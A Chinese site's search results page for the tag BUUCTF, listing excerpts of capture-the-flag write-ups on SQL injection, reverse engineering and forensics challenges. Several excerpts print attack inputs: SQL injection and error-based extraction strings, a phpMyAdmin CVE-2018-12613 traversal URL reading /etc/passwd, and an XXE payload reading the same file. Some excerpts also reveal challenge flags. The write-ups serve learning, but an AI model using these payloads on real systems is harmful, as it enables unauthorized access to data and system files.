网站首页 站内搜索

搜索结果

查询Tags标签: BUUCTF,共有 122条记录
  • buuctf | [极客大挑战 2019]HardSQL

    时间:August 8 2022 经过测试发现闭合用单引号 过滤了空格等字符和sql关键词,用%20、%0a、/**/来绕过都不行fuzzing一下,看有哪些关键词和字符被过滤了: import requestswith open(Sql.txt) as f:for line in f:line = line.replace(\n,)url = fhttp://4eaf0972-f579-…

    2022/8/9 2:22:57 人评论 次浏览
  • BUUCTF-[RCTF2015]EasySQL

    1、进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。2、因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。3、注册admin\,登陆进…

    2022/7/27 2:22:45 人评论 次浏览
  • buuctf*[PHPMYADMIN]CVE-2018-12613 1

    http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 在sql里面执行 SELECT <?=phpinfo()?>; http://node4.buuoj.cn:26180/index.php?target=sql.php?/../../../../../../../../../tmp/sess_be13990e05aa8958689867e1…

    2022/7/24 14:30:47 人评论 次浏览
  • 【BUUCTF】[极客大挑战 2019]LoveSQL

    1、打开靶机,先尝试一下万能密码1 adminor 1=1# 2 12342、尝试爆字段1 adminorder by 1# 2 adminorder by 2# 3 adminorder by 3# 4 adminorder by 4#3、看回显位置1 1 union select 1,2,3#回显在二、三位置 4、爆数据库1 1 union select 1,database(),version()#5、爆表…

    2022/7/23 2:22:47 人评论 次浏览
  • BUUCTF[极客大挑战 2019]HardSQL

    1、burpsuit抓包,跑一下fuzz发现长度为736的都被过滤掉了2、观察error界面,猜测应该是报错注入 先爆数据库名1 adminor(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~得到数据库名geek 3、爆表名1 adminor(updatexml(1,concat(0x7e,(select(table_name)fro…

    2022/7/23 2:22:42 人评论 次浏览
  • web*buuctf*[PHP]XXE 1

    <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root> payload

    2022/7/10 1:21:21 人评论 次浏览
  • BUUCTF-web 【极客大挑战2019】EasySQL

    打开环境: 根据题目提示:简单的sql,猜测需要sql注入,于是测试注入 随便输入用户名和密码,并进行简单的order by测试 联合注入: 成功拿到flag!

    2022/7/9 2:22:06 人评论 次浏览
  • BUUCTF---Reverse---reverse1

    BUUCTF---Reverse---reverse1flag:flag{hell0_w0rld} 解题步骤: 1、观察题目,下载附件2、下载好后发现文件无法打开,提示报错,选择IDA打开,使用IDA64位打开3、使用Shift+F12,打开字符串窗口,将所有字符串进行列出,发现存在flag字样的字符串4、双击包含flag的字符…

    2022/7/6 23:30:06 人评论 次浏览
  • buuctf-ACTF2020新生赛-oruga(2)

    buuctf-ACTF2020新生赛-oruga(2) 书接上文 一开始打算爆破它,不过好像有点难 于是重新回到题,首先它是一个迷宫题,因此我们要先找到的是起点 终点 方向 因此33是它的终点 //当v2这个下标走到33的时候 一切就结束了 其次我们是用来判断是否超出的 符合这个循环只有左上…

    2022/7/1 6:49:38 人评论 次浏览
  • BUUCTF_Re_[MRCTF2020]Xor

    32位,无壳 IDA解析的时候.给了个奇怪的提示,没怎么注意,好像是pdb的问题 然后我的 IDA就不能反汇编了 那就 手撸 发现两个异或 第一个异或找不到什么东东 但是第二个函数 这个黄标函数里面有一串字符串 还有个M MSAWB~FXZ:J:`tQJ"N@ bpdd}8g 然后 异或的对象就真看…

    2022/4/26 23:16:44 人评论 次浏览
  • BUUCTF:[BSidesSF2019]zippy

    题目来源:https://buuoj.cn/challenges#[BSidesSF2019]zippy流量题 打开发现只有TCP流 追踪一下得到一个zip的密码:supercomplexpassword binwalk得到flag.zip解压flag{this_flag_is_your_flag}

    2022/1/30 6:04:56 人评论 次浏览
  • BUUCTF:[MRCTF2020]Hello_ misc

    题目来源:https://buuoj.cn/challenges#[MRCTF2020]Hello_%20misc题目给了两个文件rar加密 先看png stegsolve发现在red0有隐写导出png得到一个压缩包密码:!@#$%67*()-+ 那么try to restore it.png应该隐藏了一个zip 用binwalk或者foremost分离得到一个zip 用!@#$%67*()-+…

    2022/1/30 6:04:54 人评论 次浏览
  • BUUCTF:[MRCTF2020]不眠之夜

    题目来源:https://buuoj.cn/challenges#[MRCTF2020]%E4%B8%8D%E7%9C%A0%E4%B9%8B%E5%A4%9C拼图flag{Why_4re_U_5o_ShuL1an??}

    2022/1/30 6:04:43 人评论 次浏览
  • BUUCTF:[MRCTF2020]Unravel!!

    题目来源:https://buuoj.cn/challenges#[MRCTF2020]Unravel!!zip加密 先看另外两个文件wav文件尾 AESpng用foremost分离得到秘钥:Tokyo解密 得到zip密码解压SilentEyeflag{Th1s_is_the_3nd1n9}参考:https://blog.csdn.net/mochu7777777/article/details/109671882

    2022/1/30 6:04:39 人评论 次浏览
  • BUUCTF:粽子的来历

    题目地址:https://buuoj.cn/challenges#%E7%B2%BD%E5%AD%90%E7%9A%84%E6%9D%A5%E5%8E%86题给了四个损坏的压缩包没做过类似的题 遂上网搜wp 将IComeFromAlibaba都改为修改后可正常打开 间距大的为1 较小的为0然后根据题目提示用MD5加密取32位 小写(记得去空格 flag{d473ee…

    2022/1/30 6:04:35 人评论 次浏览
共122记录«上一页1234...9下一页»
扫一扫关注最新编程教程